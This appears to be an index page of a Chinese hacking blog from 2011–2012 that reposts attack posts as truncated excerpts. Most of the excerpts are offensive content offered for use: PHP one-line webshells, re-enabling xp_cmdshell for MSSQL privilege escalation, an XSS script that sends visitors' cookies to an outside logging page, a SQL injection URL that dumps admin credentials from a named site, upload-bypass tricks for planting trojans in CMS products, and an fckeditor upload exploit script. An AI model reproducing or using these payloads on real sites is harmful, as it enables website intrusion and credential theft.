Feb132012
浅谈Ddos攻击攻击与防御 转自80sec
浅谈Ddos攻击攻击与防御
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2011-2-10
From: http://www.80sec.com/
[ 目录 ]
一 背景
二 应急响应
三 常见ddos攻击及防御
四 根源及反击
五 总结
一 背景
在前几天,我们运营的某网站遭受了一次ddos攻击,我们的网站是一个公益性质的网站,为各个厂商和白帽子之间搭建一个平台以传递安全问题等信息,我们并不清楚因为什么原因会遭...阅读全文
抢沙发
Feb122012
两个边形的一句话
转自 http://hi.baidu.com/myvbscript/blog/item/ebfb9a8226ca238cf703a6b1.html
第一种:1.php
?View Code PHP1
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
我变了一下,在菜刀里写http://127.0.0.1:88/1.php?2=assert密码是1
第二种2.php
?View Code PHP1
2
3
4
5
6
< ?php
$_="";
$_[+""]='';
$_="$_"...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:47 views |
Dec172011
Dec172011
1433 sa提权详细过程
转自土司 T00ls.net
1、 无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)
这种情况比较常见的,修复起来说简单也简单,但是有条件的。这种情况要是能列出目录(用sqltools v2.0就有列目录功能)恭喜你这个有80%的情况能修复了,如果能列目录,那么只要找到xplog70.dll的路径执行以下命令就可以了。
第一步
exec sp_dropextendedproc ‘xp_cmdshell&...阅读全文
Dec152011
ashx脚本 生成一句话
今天检测一个站安全 net aspx winiis 环境
发下有fckeditor 但没有上传点 自己构造了一个上传点 aa.asp;.jpg不能上传
忽然想起一篇文章 上传ashx脚本 访问后生成一句话
脚本内容为
?View Code HTML1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
using System...阅读全文
Dec152011
Fckeditor 2.4.2 php任意上传文件漏洞
1、漏洞描述
fckeditor/editor/filemanager/upload/php/upload.php
?View Code PHP1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
9...阅读全文
Dec102011
XSS偷cookie的代码
<script>document.write(‘<img src=”http://url/news.asp?msg=’+document.cookie+’” width=0 height=0 border=0 />’);</script>
news.asp代码:
<%
msg=Request.ServerVariables(“QUERY_STRING”)
testfile=Server.MapPath(“cook.txt”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(test...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:262 views |
Nov232011
千博企业网站管理系统漏洞
在NoSql.asp文件中7kccopyd-code
<%
If EnableStopInjection = True Then
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
Fy_In = “’|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare”
Fy_Inf = Split(Fy_In, “|”)
If Request.Form<>”" Then
For Each Fy_Post In Request.Form
For Fy_Xh = 0 To UBound(Fy_Inf)
If InStr(L...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:220 views |
Nov012011
shopex 4.85 后台拿SHELL
今天有人公布一shopex 4.85 后台拿SHELL信好不是我发现那个,嘿嘿,转过来发布!
刚在官方下了一个最新的自己测试了一下。很简单的。
进后台(废话)
http://localhost/shopadmin/index.php#ctl=system/template&act=editor&p[0]=purple&p[1]=index.php
自己编辑吧。。
http://localhost/themes/purple/index.php就是这个文件咯。
阅读全文
作者:骚鱼 | 分类:Hack | 阅读:275 views |
Oct312011
discuz 7.2 爆路径 漏洞
这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。
“manyou/admincp.php?my_suffix=%0A%0DTOBY57″,引号不算。
例如:
http://team.dis9.com/manyou/admincp.php?my_suffix=%0A%0DTOBY57
效果图如下:
阅读全文
作者:骚鱼 | 分类:Hack | 阅读:398 views |
Oct202011
php后台插入一句话思路
首先介绍下php的各种标签:
1):
<?php ?>
demo:
<?php echo "test";?>
这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!
2):
<? echo "test"; ?>
这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,
大多程序员都是很熟悉的!我们把这种标签称为短语标签!
3):
<script language="ph...阅读全文
Oct192011
fckeditor <= 2.6.4 任意文件上传漏洞
fckeditor <= 2.6.4 任意文件上传漏洞
简要描述:
fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测
详细说明:
currentfolder过滤不给力啊,但是GPC就能让它脑残
代码<?
error_reporting(0);
set_time_limit(0);
ini_set(“default_socket_timeout”, 5);
define(STDIN, fopen(“php://stdin”, “r”));
$match = array();
function h...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:419 views |
Oct192011
住哪网酒店分销联盟系统SQL注入漏洞
发布日期:2011-09.08
发布作者:歌颂
漏洞类型:SQL注入
漏洞描述:住哪网酒店分销联盟系统SQL注入漏洞,直接爆出管理员帐号密码。
Search:inurl:index.php?m=hotelinfo
注入EXP:
http://yunsec.net/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
默认后台:index.php?m=admin/logi...阅读全文
Oct192011
ecshop v2.7.2 漏洞
漏洞分析:
先看下漏洞是怎么产生的!直接看代码:
js/calendar.php
$lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞
if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’))
{
$lang = ‘zh_cn’;
}
require(dirname(dirname(__FILE__)) . ‘/data/config.php’);
header(‘Content-type: application/x-javascript; charset=...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:479 views |
Oct142011
PHP Exp漏洞的利用方法
很多人都看到过一些关于PHP的EXP程序,但都不会利用。其实这种漏洞利用程序利用起来很简单的。
首先我们来在本地装一下php的运行环境。打开php-installer,一切设置都默认(我安装的目录是D盘的php),一路next就可以了
我们用PHPCMS的一个漏洞来做演示。
我们可以发现这些EXP都是PHP的代码,这怎么弄呢?
大家别急,先把这段代码用记事本保存下来,我保存在D:/php/phpcms.php这里了。现在...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:308 views |
Oct142011
风讯dotNETCMS 0day
漏洞影响:风讯dotNETCMS 通杀 测试了 v1.0 sp4 sp5
漏洞作者:kooice
漏洞出在用户页面,注册个用户。文章管理,上传。。选择文件名不变….
上传1.asp;.jpg
然后你们懂的!
阅读全文
作者:骚鱼 | 分类:Hack | 阅读:218 views |
Oct142011
风讯 dotNETCMS 上传漏洞及修复
/user/login.aspx ,点注册。
点击发表文章。
在发表文章页面,点击“选择图片”
我们在这里,记下这个目录名, Userfiles/049357214223 , 这是你的附件保存的目录名。
然后在站内信息那块, 给自己发送个站内信,附件里直接传马。
然后,在收件箱找到这个站内信,打开,下载附件,在这里记录下我们的马儿上传上去后的名字就好了。
得到马儿的新名字: c58f7a4d960...阅读全文
作者:骚鱼 | 分类:Hack | 阅读:249 views |
我的微博
最活跃的读者
最新评论
在家上网赚钱:
学习了,顶博主 以后会常来关注的计算机毕业设计:
很强大 非常支持网赚论坛:
贵站做的不错,可不可以和贵站做下混世魔王:
复制来的文章,你还好意思标明!你好:
你好 请问单页类站的支付系统怎么混世魔王:
已做好贵站的链接了。人类:
IE不起作用啊?谷歌 火狐都正常活金蛋白:
文章很不错,支持博主。安睡宝:
很好的内容。让我深受感触。妙姿堂特效祛斑王:
支持原创,过来转转,欢迎互踩
